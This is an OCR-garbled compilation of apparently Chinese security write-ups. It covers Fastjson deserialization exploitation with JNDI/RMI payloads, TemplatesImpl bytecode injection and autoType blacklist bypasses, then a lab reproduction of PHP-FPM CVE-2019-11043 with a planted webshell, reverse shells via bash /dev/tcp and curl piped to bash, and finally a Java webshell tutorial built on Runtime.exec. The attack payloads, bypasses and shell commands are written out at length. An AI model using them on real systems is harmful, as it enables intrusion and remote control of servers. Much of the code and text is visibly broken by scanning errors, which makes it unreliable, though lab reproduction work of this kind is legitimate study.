V2xs2WNDaWSuCy SUcmF uc 22cm Le ju9V i rX200YmQL AAHDWAAAABXNy ADT veme YXBny2h 1 sNvbii vbnMuY29s DOV j OG | vbnMuZnvuY 3i vcnMuQ2 Que 3 RhhntüceF uc 22v cei Le 1h27 R8  BATGUAQAB! AAJaUNVDnNOYWSOCQE* AANGCHZ yABFQYX2NL mxhbme 
ZORASAAAAARANAAR HB t AUD nLmEwTWNO2S5 j621 (0252 LmNvbGx Y3Rpb25 2 LmZ1beN0b2J z Lk ludar ZXJUcwF uc ZZ vem] cof o/2t? fM4GAYADWWAF AUF y23NGABNE TGphdaE vbGFuzy 9? Yao Y307 TAALaU1 1 dOhv 2 EShbWVBAD JMamf 2 YS0s YwonL 1) 
AMtpUOF y YW1UeXB c 3QAF T tMamF 2YS95 YWSnL ON S YXNZO3hwdX TAE? MAF 2755s YwSnl k9: amV j dDuQz1 i f FHMpbATAAHnwAAAAAnQACNd LAF Lbnàpbhiv t co ASWOxqYXZhLixhbmcuQ? xhc 37 qxbXr s vNWpKCAAR éCARAAABOAA Lh ZXRNZXfrob bart 


FGphnt ubGF uZySTOMJpbmegBKQAe j uz Qg I AMIhwdnEA fgAUC3EAT gATGXEA FGAYAAAAADBI cQU+ ABQAAAAATAAGAWS2b2t 1dXEAT GADAAAAAn Z yABBQYXZh LmxhbacuTZ 3qZWN@AARAAAAARAAAAAUGCHY x AHGAGHNXAHAAEVyABNDTGphdnt ul dii 
SekdeOcCAABAEAAAAAF OACF VCOVU CB HE saMNhdG  vbnMvQ2F Y VY VKRvc  Shc HBOAAR LeGV {dXLACGABAAAAAKEAT JAJC SCA GAP 3TACMDNGME UbGf ul y6 bR 1Z7VyEuNgpPeBNZCAAF JAAVZYW 1 ZXhyABBqYXZhLmxhbmc TV Ya yh taie e 
AAF zc OARamF 2YS5 1451 SL khhc2hNYXAF Br Bw Zg8QMAAkYACRx v YWRGYWNGDA JAA 12H 1 c2hvbGRécDTAAAAAAAAACINQ AAAAQAAAAAHA eA» 
bhddjipoc bhadis Ù 


在 上 述 的 ldap 服 务 端 中 加 入 


String evilString-z"rOOABXNyABFqYXZhLn....."; 


e.addAttribute( javaSerializeddata", Base64.decode(evilString)); 


public class test { 
public static void main(String[] args) throws AlreadyBoundException, RemoteException, Nam ept 





LdapServer.start( classnamel: "Exploit", 
String test="{\"G@type\":\"com. sun. rowse| 
"\"dataSourceName\":\"ldap://le 
"\"autoCommit\": true)"; 
JSON. parse(test); 


基于 特殊 类 


@type 赋 值 为 该 类 com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl ,无 
使 用 rmi 或 ldap 远 程 加 载 类 ， 因 此 对 jdk 版 本 无 限制 。 


@type 加 载 进 该 类 ， 设 置 变量 _outputproperties 和 _bytecodes 。 


在 fastjson 解 析 时 ， 由 于 存在 _outputproperties 变量 ， 会 去 调用 getoutputProperties A 
法 。 之 后 会 调试 解释 。 
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=. 
public class Poc { 


// 将 CLass 文 件 流 编码 为 base64 


public static String readClass(String cls){ 


ByteArrayOutputStream bos = new ByteArrayOutputStream(); 


ie 4 


IOUtils.copy(new FileInputStream(new File(cls)), bos); 


) catch (IOException e) { 


e.printStackTrace(); 


return Base64. encodeBase64String(bos.toByteArray()); 


public static void test_autoTypeDeny() throws Exception { 


ParserConfig config = new ParserConfig(); 


final String fileSeparator = System.getProperty("file.separator"); 


i 


// 当 前 程序 目录 


final String evilClassPath = System.getProperty("user.dir") + 


"/target/classes/person/Test.class"; 


//evilcode 为 base64 编 码 后 的 字符 串 


String evilCode = readClass(evilClassPath) ; 





final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.t 
//payload 
String texti = "{"@type":"" + NASTY CLASS + 

"" " bytecodes":[""*evilCode*""],' name':'a.b',' tfactory':( 


System.out.println(text1); 
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//json 解 析 
tic void main(String args[]){ 
‘test_autoTypeDeny/ ys 


catch (Exception e) ( 


= e.printStackTrace(); 


_bytecodes 加 载 进 的 类 如 下 : 
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a obj = JSON.parseObject(text1, Object.class, config, Feature.Suppc 


Geer * 
public class extends tractTranslet { 
public throws IOException { 
Runtime.getRuntime().exec("open /tmp"); 
} 
QOverride 
public void throw 
} 
QOverride 
public void 
T 
public static void | ring[] a throws Exception { 
Test t = new Test(); 
} 
} 
问题 : 





为 什么 Test 类 中 要 继承 AbstractTranslet， 为 什么 需要 重 写 transform 两 个 方法 。transform 方 法 一 


个 是 两 个 参数 ， 一 个 是 三 个 参数 。 


以 下 为 造成 远程 命令 执行 的 关键 代码 ， 意 思 是 将 _bytecodes base64 解 码 后 的 类 加 载 进来 并 实例 
化 。 可 以 看 到 代码 将 实例 化 后 的 对 象 强制 转化 为 AbstractTranslet 类 型 。 为 了 使 得 程序 不 出 
错 ， 我 们 需要 在 Test 类 中 继承 AbstractTranslet。 
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C 4 » mE ec 


tractTranslet translet = (AbstractTranslet) class[ transletIndex].newInstanc 


上 


tractTranslet 是 一 个 抽象 类 ， 抽 象 类 中 有 一 个 抽象 方法 ， 如 下 所 示 : 


Me abstract void 

ler)throws TransletExcer 
[ > 

RES ELAR TSK, 

est 类 必须 重 写 Abst ractTranslet 类 的 transform 方 法 (三 个 输入 参数 ) o 


tractTranslet 类 继承 于 Translet 类 。Translet 是 一 个 接口 类 ，AbstractTranslet 类 是 一 个 抽 


不 必 实 现 接口 的 所 有 方法 ， 但 是 普通 类 必须 实现 接口 的 所 有 方法 。 


E 普 通 类 ， 继 承 于 AbstractTranslet 类 ，AbstractTranslet 类 继承 于 Translet 接 口 ， 因 此 Test% 
ranslet 接 口 o 


Translet 类 实现 了 Translet 接 口 类 中 的 所 有 方法 ， 除 了 以 下 这 个 方法 。 (两 个 参数 ) 


€ void transform(DOM document, SerializationHandler[] handlers)throws Trans 


b 


是 一 个 普通 类 ， 需 要 实现 Translet 接 口 的 所 有 方法 。 因 此 Test 类 需要 实 
actTranslet 类 中 未 实现 的 Translet 接 口 里 的 方法 。 即 上 述 transform 方 法 (两 个 输入 参 


是 处 理 @typej a 
的 @ype 加 载 类 的 条 件 是 : 

量 可 控 ， 且 值 可 传 入 某 些 人 敏感 函数 

个 变量 对 应 的 seugetlis 方 法 且 方 法 中 含有 敏感 落 


VSetimpl 类 为 例 ， 就 是 将 json 数 据 中 的 "autocommit" :true 读 入 。fastjson 解 析 时 ， 调 
9WwSetimpl| 类 的 setAutoCcommit 方 法 ， 该 方法 调用 了 lookup 函 数 。 而 lookup 函 数 的 输入 参 
UrceName 成 员 变 量 ， 在 json 数 据 中 可 控 。 
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在 parse 处 下 断 点 调试 。 pof 


public class mytest { 
public static void main(String[] args) throws NamingException, IOExcept 
AlreadyBoundException { 
detetct.jndi server( classname: "Exploit", port 1099); 
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "trug 
String test="{\"@type\":\"com.sun.rowset.JdbcRowSetImpt\"," + 
"\"dataSourceName\":\"rmi://Localhost:1099/Exploit\"," + 
"\"autoCommit\": true}; 
System.out.println(test); 
D JSON.parse(test); 


i 
。 问 ; 什么 样 的 变量 会 被 加 载 类 方法 ? 
经 调试 知 ， 是 在 以 下 语句 执行 时 ， 完 成 了 fieldList 的 赋值 。 


ObjectDeserializer deserializer = config.getDeserializer(clazz); 


关键 在 于 其 中 的 JavaBeanlnfo.java。 
会 建立 一 个 fieldList 对 象 ， 存 储 每 个 满足 一 定 条 件 的 field 对 象 。filed 对 象 包含 
。 变量 名 
。 所 在 类 
。 对 应 set/get 方 法 
。 方法 返回 类 型 所 在 类 
。 方法 参数 类 型 所 在 类 





field = set/get 的 方法 名 去 掉 set/get， 并 将 第 一 个 字母 小 写 
fieid 的 set 或 get 方 法 应 满足 以 下 条 件 

set 方 法 具体 特征 : 

。 length 大 于 等 于 4 


if (methodName.length() < ^) { 


continue; 


。 不 是 static 类 型 
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continue; 


本 值 类 型 为 void 类 型 或 者 不 等 于 所 在 类 的 类 型 


( (method. getReturnType() .equals (Void. TYPE) || method.getReturnType().equ 


continue; 





>] types = method.getParameterTypes(); 


为 set 开 头 (或 者 含有 注解 ) 
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^7java m— 4 v 
if (annotation.name().length() != 0) { 
String propertyName - annotation.name(); 
add(fieldList, new FieldInfo(propertyName, method, null, clazz, type, or 


continue; 


if (!methodName.startsWith("set")) ( // TODO "set" 的 判断 放 在 JSONField 注解 


continue; 


get 方 法 具体 特征 : 
。 length 大 于 等 于 4 


“java 
if (methodName.length() < 4) { 


continue; 


。 不 是 static 类 型 
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E P MUR wg toe 





jer.isStatic(method.getModifiers())) { 


continue; 


)dName . startsWith("get") && Character.isUpperCase(methodName.charAt(3))) 


iod.getParameterTypes().length !- 0) { 


Se timpl 类 的 fieldList 加 载 了 以 下 变量 : 
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fieldList = {ArrayList@3154}° size = 8 


0 = {Fieldinfo@3271} "matchColumn" 

1 = {FieldInfo@3272} "autoCommit" 

2 = nfo@3273} "command" 

a (32/4) "dataSourceName" | 
4 = fo@3275} "url" | 
5= "username" 

6s "password" 

s "type" 


。 j8: 上 一 问 得 到 的 fieldList 里 的 变量 所 对 应 的 方法 中 哪些 会 被 调用 ? 


经 调试 知 ， 是 在 以 下 语句 执行 时 ， 调 用 了 部 分 变量 的 set/get 方 法 ， 从 而 造成 远程 代码 执行 。 


return deserializer.deserialze(this, clazz, fieldName); 


关键 在 JavaBeanDeserializer,java 的 deserialze 方 法 。 


上 一 问 得 到 的 fledList 会 根据 变量 名 进行 排名 得 到 sortedFieldDeserializers ， 其 中 有 
autoCommit、command 等 。 
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© {DefaultFieldDeserializer@1133} 
P= {DefaultFieldDeserializer@1134} 
f= {DefaultFieldDeserializer@1135} 
B {DefaultFieldDeserializer@1136} 














= {DefaultFieldDeserializer@1137} 
a {DefaultFieldDeserializer@1138} 
f= {DefaultFieldDeserializer@1139} 
f- {DefaultFieldDeserializer@1140} 
)- {DefaultFieldDeserializer@1141} 
0 = {DefaultFieldDeserializer@1142} 
= {DefaultFieldDeserializer@1143} 
2= {DefaultFieldDeserializer@114.4} 
B= {DefaultFieldDeserializer@1145} 
if = {DefaultFieldDeserializer@1146} 
B = {DefaultFieldDeserializer@1147} 
6 = {DefaultFieldDeserializer@1148} 
7 = {DefaultFieldDeserializer@1149} 
8 = {DefaultFieldDeserializer@1150} 


WSetlmpl 类 的 成 员 变量 ， 当 在 json 数 据 中 时 会 被 自动 读 取 。 
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P. object = (JdbcR 'wSetimpli(91080;7 


=» a ha ha ha -h a aA a -—h ha h a hhh ch ch ch 


conn = null 

ps - null 

rs = null 

rowsMD = null 

resMD = null 

iMatchColumns = {Vector@1107} size = 10 
strMatchColumns = {Vector@1108} size = 10 
resBundle = bcRowSetResourceBut 11C 
binaryStream - null 

unicodeStream = null 

asciiStream = null 

charStream = null 

command = null 

URL = null 

dataSource = "rmi://localhost:1099/Exploit" 
username = null 

password = null 

rowSetType = 1004 

showDeleted = false 

queryTimeout = 0 

maxRows = 0 

maxFieldSize = 0 

concurrency = 1008 

readOnly = true 

escapeProcessing = true 

isolation = 2 

fetchDir = 1000 

fetchSize = 0 


map = null 
listeners = {Vector@1111} size = 0 
params = {Hashtable@1112} size = 0 
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BB 


eserializers 会 被 for 特 环 遍历 每 一 个 field 对 象 ， 不 同 的 field 对 象 对 应 的 变量 名 根据 不 同 
代码 分 支 。 


A 






JFieldDeserializers 中 的 变量 名 在 json 数 据 中 存在 ， 则 会 进入 


eldDeser.setValue(object, fieldValue); 


izerjava 的 setValue 方 法 。 
b edFieldDeserializers[i] 

[^ 法 (即使 用 了 method.invoke) 
fo 中 的 method 必 须 存在 


只 有 get 方 法 ， 那 么 fieldInfo 对 象 的 method 为 getXXX 方 法 ， 且 返回 类 型 满足 一 定 条 件 
p.class.isAssignableFrom(method.getReturnType() ) ， 则 进入 某 个 分 支 进行 


只 有 get 方 法 ， 那 么 method 为 setXXX 方 法 ， 进 行 invoke 调 用 
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=- 


if (method != null) { 
if (fieldInfo.getOnly) { 
if (fieldInfo.fieldClass == AtomicInteger.class) { 
AtomicInteger atomic = (AtomicInteger) method.invoke(object); 
if (atomic !- null) ( 


atomic.set(((AtomicInteger) value).get()); 


} else if (fieldInfo.fieldClass == AtomicLong.class) { 
AtomicLong atomic = (AtomicLong) method.invoke(object); 
if (atomic != null) { 


atomic.set(((AtomicLong) value).get()); 


} eise if (fieldInfo.fieldClass == AtomicBoolean.class) { 
AtomicBoolean atomic = (AtomicBoolean) method.invoke(object); 
if (atomic != null) { 


atomic.set(((AtomicBoolean) value).get()); 


} else if (Map.class.isAssignableFrom(method.getReturnType())) { 
Map map = (Map) method.invoke(object); 
if (map != null) { 


map.putAll((Map) value); 


Collection collection = (Collection) method.invoke(object); 





224 










yke(object, value); 


会 被 0 载 到 object 

法 或 者 只 有 get 方 法 H 返回 类 型 满足 一 定 条 件 ， 该 set/get 方 法 会 被 调用 
条 件 见 前 一 个 问题 
SPENSER 
有 敏感 函数 (如 JdbcRowSetlmpl 类 的 setAutoCommit) 


敏感 函数 ， 且 只 实现 了 get 方 法 ， 且 返回 类 型 满足 一 定 条 件 ， 条 件 见 第 一 问 (如 
mpl 类 的 getOutputProperties) 


25 版 本 的 时 候 ， 再 去 执行 上 述 代码 ， 会 出 现 以 下 报错 


pe d "main" com.alibaba.fastjson.JSONException: autoType is not support. com.sun.rowset.JdbcRowSetImpl 
i »fastjson.parser.ParserConfig.checkAutoType( ) 

20 »fastjson.parser.DefaultJSONParser.parseObject( ) 

a. fastjson.parser.DefaultJSONParser.parse( ) 

0a fastjson.parser.DefaultJSONParser.parse( ) 

fastjson.JSON.parse( 
+ fastjson. JSON. parse( 
1 gboottest.testone.controller.testtmp.main(testtmp.java:28) 


nfig 类 的 checkAutoType 方法 中 ， 如 果 类 名 以 黑 名 单 denyList 中 的 字符 串 开 头 ， 则 抛 
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» 
for (int i = 0; i < denyList.length; ++i) { 


String deny - denyList[i]; 
* (className.startsWwith(deny)) { 


ew JSONException("autoType is not suppor © + typeName); 





denyList£e 34%, HF com.sun.rowset.JdbcRowSetImpl 以 com.sun 开头 ， 所 
以 className.startsWith(deny) 为 true。fastjson 数 据 中 的 @type 的 值 不 能 以 黑 名单 上 的 字 
开头 ， 因 此 抛 出 错误 。 


denyList 如 下 所 示 : 


private String[] denyList = "bsh,com.mchange,com.sun.,java.lang.Threa wa. 


除了 绕 过 黑 名 单 上 的 类 的 方法 ， 大 佬 们 还 想 出 了 另外 一 种 方法 。 


使 用 Lcom.sun.rowset.JdbcRowSetImpl; ， 可 绕 过 checkAutoType 的 检测 ， 又 可 执行 
loadClass. 


由 于 输入 的 类 以 L 开头 ; 结尾 ， 去 掉 前 后 两 个 字符 之 后 直接 执行 loadClass， 绕 过 了 
checkAutoTypeo 


226 


ponentType = loadClass(className.substring(i), classLoader); 


y.newInstance(componentType, ©).getClass(); 





e.startsWith('.") && className.endsWith(' ; )) { 
ewClassName = className.substring(., className.length() - `); 


dClass(newClassName, classLoader); 
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- b ¥ 


for (int i = 0; i < acceptList.length; ++i) { 
String accept = acceptList[i]; 


if (className.startsWith(accept)) { 







clazz - TypeUtils.loadClass(typeName, defaultClassLoader); 


if (expectClass !- null && expectClass.isAssignableFrom(clazz)) { 
throw new JSONException("type not match. " + typeName + " "+ 

} 

return clazz; 


跳 到 了 checkAutoType 的 最 后 ，!autoTypeSupport 为 tue， 因 此 无 法 loadClass。 


if (!autoTypeSupport) { 


throw new JSONException("autoType is not support. " + typeName); 


版 本 : fastjson1.2.47 及 其 之 前 


由 于 调用 loadClass 方 法 时 ，cache 恒 为 true， 导 致 恶意 类 不 通过 @type 加 载 进 ， 却 put 进 HashMap 
躲 过 了 checkAutoType 的 检测 。 


在 第 二 次 解析 时 ， 通 过 @type 加 载 进 恶 意 类 ，checkAutoType 方 法 会 从 HashMap 中 读 取 相 应 类 并 
回 ， 也 躲 过 了 checkAutoType 的 检测 。 


POC 
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T Sh sU » E > 
d="{"@type": "java. lang.Class”, "val": “com. sun. rowset . JdbcRowSet Imp1" 


parse(payload_2) 时 ，chekAutoType 方 法 里 ， 以 下 语句 会 返回 class 
et. JdbcRowSetImpl o 


3 null) ( 


- TypeUtils.getClassFromMapping(typeName); 


WUtoType 方 法 中 会 进入 该 分 支 ， 并 且 由 于 expectClass 为 null， 会 运行 到 return 


KAutoType 方 法 时 不 会 抛 出 异常 。 
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if (clazz We nulki) t 
(expectClass != r 
&& clazz !- java.util.HashMap.class 
&& lexpectClass.isAssignableFrom(clazz)) { 


JSONException( t| | + typeName + + expec’ 


clazz: 


而 当 删 去 ISON.parse(payload) ， 仅 执行 JISON.parse(payload_2) 时 ， 以 下 语句 的 返回 
nulla 


if (clazz -- nu 





clazz - TypeUtils.getClassFromMapping(typeName); 


j 
因此 还 是 会 抛 出 异常 。 
if (Arrays.binarySearch(denyHashCodes, hash) >= 9) { 
throw new JSONException("autoType is not suppor + typeName); 
} 


Exception in thread "main" com.alibaba.fastjson.JSONException: autoType is not support. com. sun. rowset . JdbcRowSet 
at com.alibaba.fastjson.parser.ParserConfig.checkAutoType(ParserConfíg.iava:974) 
at com.alíbaba.fastjson.parser.DefaultJSONParser.parseObject( ) 
at com.alibaba.fastjson.parser.DefaultJSONParser.parse( ) 
at com.alibaba.fastjson.parser.DefaultJSONParser,parse( ) 
at com.alibaba, fastjson. JSON. parse( 


at com.alibaba.fastjson.JSON.parse( ) 
at com.alibaba. fastjson. JSON, parse( ) 
at com.springboottest.testone.controller.testtmp.main(iestimp.java:36) 


clazz = TypeUtils.getClassFromMapping(typeName); 的 用 途 是 


从 mappings 中 根据 typename 即 com.sun.rowset.JdbcRowSetImpl ， 返 回 对 应 的 类 对 象 。 





了 3 站 



















] JSON.parse(payload) 的 结果 就 是 mappings 里 有 没 — 
rowset.JdbcRowSetImpl o 


j E JSON.parse(payload) 。 


E' 


e(payload) 中 的 @type 中 的 java.lang.Class 会 调用 TypeUtils.java 中 
ss 方法 。 
ss s 方法 中 搜索 mappings.put ， 将 三 个 都 打上 断 点 ， 总 有 一 个 是 对 的 .. 


设立 条 件 ， 直 到 className 等 于 com.sun.rowset.JdbcRowSetImpl 才 可 跳 到 这 
Bis 


if (cache) { 
mappings.put(className, clazz); 


1 return clazz; 


D - catch(Throwable e)í 
e.printStackTrace(); 
// skip 


ClassLoader contextClassLoader - Thread.currentThread().getContextClassLoader(); 
if(contextClassLoader != null && contextClassLoader != classLoader){ 
clazz = contextClassLoader. loadClass(className) ; 
if (cache) { 
mappings.put(className, clazz); 


return clazz; 


catch(Throwable e){ 
E // skip 


clazz = Class.forName(className); 
mappings.put(className, clazz); 
| — return clazz; 

catch(Throwable e){ 


因此 与 cache 的 值 有 关 。 


SLoader contextClassLoader = Thread.currentThread(). get context elase oaderi) i 
‘contextClassLoader != null && contextClassLoader != bm ern la: ader: 
E z= contextClassLoader. loadClass(className); ader: Launcher$ 
Bat (cache) { cache: tri 
— mappings. pu className clazz); className: "com.sun.rowset.JdbcRowSetimpl" CE 
£ 


. return clazz; TL 
ch(Throwable e){ 
skip 


lass 时 ，cache 的 值 恒 为 true， 因 此 造成 了 将 恶意 类 读 入 缓存 HashMap。 








ass(className, classLoader, true); 


heckAutoType 方 法 
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o 绕 过 黑 名 单 denyList 
利用 类 
o 拥有 set 或 get 方 法 (具体 特征 见 第 一 版 中 的 调试 分 析 ) 
o set 或 get 方 法 里 能 调用 实例 化 /10okup/eval 等 敏感 函数 
o 实例 化 /1ookup/eval 等 敏感 函数 的 内 容 可 控 ( 即 内 容 为 某 个 成 员 变 量 的 值 ) 
参考 链接 : 
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2019-11043 PHP 远 程 代码 执行 复 现 


2019-11043 PHP 远 程 代码 执行 复 现 


1 


都 在 满 天 的 公众 号 预警 里 面 看 过 很 多 ， 这 里 就 一 笔 带 过 。 
0 月 22 日 ,国外 安全 研究 员 公开 了 一 个 PHP-FPM 远 程 代码 执行 的 漏洞 EXP. 


Andrew Danau 在 某 比 赛 解 决 一 道 CTF 题目 时 发 现 ,向 目标 服务 器 URL 发 送 %0a 符号 
返回 异常 发 现 的 漏洞 . 


F 26 日 ,PHP 官 方 发 布 漏洞 通告 ,其 中 指出 :使 用 Nginx + php-fpm 的 服务 器 ,在 部 分 配置 下 , 存 
码 执行 漏洞. 且 该 配置 已 被 广泛 使 用 ， 危 害 较 大 ,影响 较为 广泛 .相关 工具 已 经 公开 在 
地 址 如 下 : 


fhub.com/neex/p! 


洞 环境 


新 了 vulhub， 搭 好 了 漏洞 环境 ， 方 便 复 现 ， 需 要 提前 安装 好 docker 环 境 跟 golang 环 境 ， 


clone https://github.com/vulhub/vulhub. git 
fulhub/php/CVE-2019-11043 进 到 这 个 目录 里 面 


er-compose up -d docker 生成 环境 


看 这 里 有 两 个 容器 一 个 php 7.2.10 的 跟 一 个 nginx 的 ， 这 里 可 以 看 到 默认 设置 的 是 8080 


MMAND CREATED STATUS 





nutes ago 


0 端口 index.php 显 示 正常 ， 证 明 漏洞 环境 搭建 正常 ~ 
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€- 


好 最 常 访问 © localhost 后 常用 网 址 Q) Googie % 4532152171 HH phpinfome ` zoome, 
hello world 


C ù @ 127.0.0.1:8080/index.php 


漏洞 利用 exp 下 载 
漏洞 利用 github 已 经 放出 ， 直 接 git clone 回 来 就 好 

1. git clone 

2. cd phuip-fpizdam 

3. go get -v && go build 

4, 编译 成 功 后 go run . " . 
或 者 直接 


go install github.com/neex/phuip-fpizdam 


./phuip-fpizdam http://127.0.0.1/index.php 


成 功 编译 会 如 下 图 所 示 


H p. go build 
: downloading github. com/spf13/cobra v9.0. 二 
extracting github.com/spf13/cobra v9.9.5 
downloading github.com/spfi3/pflag v1.8.3 
downloading github.com/inconshreveable/mousetrap v1.0.8 
extracting github.com/inconshreveable/mousetrap v1.0.8 
; extracting github.com/spf13/pflag v1.0.3 
po: finding github.com/spfi3/cobra v0.0.5 
po: finding github.com/spfi3/pflag v1.0.3 
ithub.com/spf13/pfIag 
bithub.com/spfi3/cobra 
phuip-fpizdam 
bogon:phuip-fpizdam lok$ ls 
README .md consts.go detect methods.go 
attack. go detect.go go. mod 


baooan .ao 


开始 利用 : 


requester.9° 
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dam lok$ go run . "http://127.0.0.1:8080/index.php" 
:39 Base status code is 200 
Status code 502 for qs1-1800, adding as a candidate 
The target is probably vulnerable. Possible QSLs: [1790 1795 1800] 


Attack params found: --qsl 1795 --pisos 248 --skip-detect 
Trying to set "“session.auto_start=0"... 
Detect() returned attack params: --qsl 1795 --pisos 248 --skip-detect «-- REMEMBER THIS 
Performing attack using php.ini settings... 
: Success! Was able to execute a command by appending "?a=/bin/sh+-c+‘whichtwhich'&" to URLs 
:41 Trying to cleanup /tmp/a... ; 





ug. LETRAS BD7S XII, 3441 38 zs docker cat /tmp/a 看 一 下 ， 是 一 个 简单 的 一 句 话 ，echo 两 
案 反 引号 直接 执行 get 传 过 来 的 a 变量 


root@993469f54451:/var/www/html# cat /tmp/a 
<?php echo ‘$_GET[a] ;return;?> 
r00t0993469f54451:/var/www/htmls Bi 





命令 执行 
然后 访问 htt 


Qu © 127.0.0.1:8080/index.php?a=id 





最 常 访 问 © localhost C 常用 网 址 @ Google a 45.32.152.171 Bl phpinfo.me ZoomEye 


uid=33(www-data) gid=33(www-data) groups=33(www-data) hello world 


ls 列 出 当前 目录 


Ca © 127.0.0.1:8080/index.php?a=Is 


[s] 


57/3 ©) localhost F SH @ Google *& 45.32.152.171 [B phpinfo.me 
index.php hello world 





有 个 地 方 要 : 
DEAE, SMEAR RUA teh Ges 





我 这 里 在 192.168.43.215 的 kali 开 启 监听 nc -Ivp 6666, 然 后 直接 访问 


i) 1270.0.1:8080/index.php?a-bash -i >& /dev/tcp/192.168.4 


Google Mẹ 45.32.152.171 BB phpinfo.me ZoomEye-Cybersp. (X) ZUBTEAWEBIJSARC.. DL) MhbKseof$e ROI. xk 首页 - wy. 


FinalShell 2.9.8 
1 192.168.43.215 


连接 成 功 
Last login: Mon Oct 21 04:17:28 2019 from 192.168.8.141 
i4 nc -lvp 6666 
listening on [any] 6666 ... 
connect to [192.168.43.215] from yuwenledeMBP-004e [192.168.43.99] 63916 
r00t6993469f54451: /var/www/html* ^C 
:-# nc -lvp 6666 


ne rit on [any] 6666 ... 


stemd 
hreadd 
u gp 


etho 了 





执行 一 次 ， 弹 不 回来 ， 执 行 两 次 ， 还 是 弹 不 回来 ， 估 计 跟 特殊 字符 编码 后 影响 有 关系 ， 这 里 直接 把 
反弹 命令 写 进 一 个 文件 里 面 ，curl 访 问 执行 


这 里 在 本 机 192.168.43.99 创 建 一 个 命名 为 touchme 的 文件 ， 然 后 内 容 为 bash -i >& 
Idev/tcp/192.168.43.215/6666 0>&1 


{bogon:CVE-2019-11043 lok$ 1s 
README . md a default.conf 
README. zh-cn . md a 的 副本 docker-compose.yml 


0gon:CVE-2019-11043 lok$ 
TPServer 8000 


y 
Serving HTTP on 0.0.0.0 port 8000 ... 





然后 直接 访问 192.168.43.99:8000/touchme |bash 


访问 可 以 看 到 有 下 载 记 录 ，shell 也 反弹 回来 了 
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MN LLL ET 


jap -O04e [192.168.43.99] 63916 





法 也 可 以 拿 来 下 载 linux 木 马 或 者 控制 程序 ， 或 者 msf 上 线 ， 剩 下 的 自己 发 挥 ! 


java webshell 从 入 门 到 入 狱 系列 1- 基 础 篇 


小 葵花 妈妈 课堂 开课 啦 ， 欢 迎 各 位 大 小 朋友 入 座 ， 本 系列 文章 纯 探讨 技术 交流 ， 请 勿 使 用 本 
的 技术 构造 恶意 webshell 非法 入 侵 他 人 网 站 。 和 警察 蜀 乘 银 手 铸 专 治 各 种 调皮 小 朋友 。 


本 系列 ， 主 要 从 webshell 基础 、 webshell 的 bypass 技术 〈 关 键 字 、 流 量 层 、hook 点 逃逸 ) 、 
透 的 webshell 维权 〈 基 于 容器 特性 的 隐 式 websheil、 内 存 shell 等 ) 等 方面 和 大 家 交流 java 中 
webshell 的 形式 ， 和 希望 与 大 家 多 多 交流 沟通 。 


基础 


java webshell 种 类 


现在 大 部 分 中 间 件 容器 ， 所 能 支持 解析 的 后 缀 ， 主 要 是 jsp, jspx 两 种 动态 脚本 为 主 ， 比 如 tomcat 
器 中 ， 默 认 能 支持 解析 的 动态 脚本 已 经 默认 写 在 配置 中 了 。 





<jsp-config> 


<jsp-property-group> 


<url-pattern>*. jspx</url-pattern> 


<url-pattern>*.jsp</url-pattern> 


<scripting-invalid>true</scripting-invalid> 


</jsp-property-group> 


</jsp-config> 
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pans 













gwebshell 的 后 门 种 类 ， 主 要 分 如 下 几 类 : E ^ 
二 名 话 webshell (比如 荣 刀 、 冰 蝎 、 蚁 剑 、c 刀 等 常见 客户 端 ) 、 专 门 负责 数据 传输 
(与 数据 库 进行 交互 ) Tunnel fal] (基于 socks5 协 议 的 reGeorg 之 类 的 ) 、 小 马 ( 单 
执行 、 单 纯 的 进行 文件 管理 /上 传 等 功能 ) 、 大 马 (集成 了 文件 管理 、 命 令 执行 、 数 据 


拿 最 基础 的 命令 执行 的 来 讨论 ， 如 何 用 多 种 方式 写 我 们 的 负责 命令 执行 的 webshell 。 
常见 的 能 够 执行 命令 的 方式 

ebshell 命令 执行 方式 

.runtime.exec() 


的 ， 使 用 java.lang.Runtime 类 进行 执行 系统 命令 ， 该 方法 也 是 目前 市 面 上 各 种 静态 查 杀 
有 助 工具 首要 盯 着 的 目标 ， 需 要 注意 的 是 win 下 和 linux 需要 区 别 对 待 ， 以 及 当 使 用 多 个 命 
注意 坑 。 下 面 我 们 来 看 看 代码 。 使 用 Runtime 类 ， 调 用 exec 执行 命令 返回 一 个 Process 
iB — A BufferedReader 类 ， 对 返回 的 结果 进行 保存 回 显 处 理 。 执行 exec 的 时 候 需要 特 
有 |,<,> 等 符号 的 命令 需要 使 用 如 下 代码 的 方式 进行 执行 ， 要 不 然 容易 出 错 。 
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// 基 础 的 调用 exec 进行 执行 系统 命令 ， 并 输出 结果 ; 


public void execBybasic(){ 


BufferedReader bufrIn = null; 
BufferedReader bufrError = null; 
StringBuilder result = new StringBuilder(); 
Process process=null; 


//linux 环境 下 进行 举例 , 执行 ls -al /tmp/ 


String[] cmd=new String[3]; 
cmd[0]-"/bin/bash"; //win , cmd.exe 
cmd[1]-"-c"; 


cmd[2]-"ls -al /tmp/"; 






smh 


Runtime run = Runtime.getRuntime();// 返 回 与 当前 Java 应 用 程序 相关 的 运行 时 
try { 
process = run.exec(cmd);// 启动 另 一 个 进程 来 执行 命令 
process.waitFor(); 
// 获取 命令 执行 结果 ， 有 两 个 结果 : 正常 的 输出 和 错误 的 输出 〈PS ;， 子 进程 的 输 
bufrIn = new BufferedReader(new InputStreamReader(process.getin 
bufrError = new BufferedReader (new InputStreamReader (process ,ge 
// 读 取 输出 
String line; 


while ((line = bufrIn.readLine()) != null) { 
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result.append(line).append(' ei 


Enile ((line = bufrError.readLine()) != null) { 


result.append(line).append(' 


_ System.out.println(result.toString()); 


catch (Exception e) { 


/XT 
urrin); 
closeStream(bufrError); 
x if (process != null) { 


E 


process.destroy(); 
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ES 


public void execBybasic()4 $ v 


P 1 Pr 


BufferedReader bufrin = nuli; 
BufferedReader bufrError = null; 
StringBuilder result = new StringBuilder(); 
Process process=null; 


gx Z: Structure 


String[] cmd=new Stringl3]; 
cmd[2] 2" /bin/bash"; 

cmd[i]s"-c"; 

cmd[2]-"ls -al /tmp/"; ndj2)e"« 





Runtime run - Runtime.getRuntime(); i) Jav Hist 
try { 
Process = run.exec(cmd); Aj HERH 
process.waitFor(); 
bufrIn = new BufferedReader(new InputStreamReader(process.getInputStream(), etName; "UTF-8")); 
bufrError = new BufferedReader(new InputStreamReader(process.getErrorStream(), ersetName: "UTF-g^))s 
String line; 
uhila (fline — hufrTn readi inef\) !— nul1\ T 
WebSheilBasic execBybasic() 


Run: WebShellBasic 





total 88 
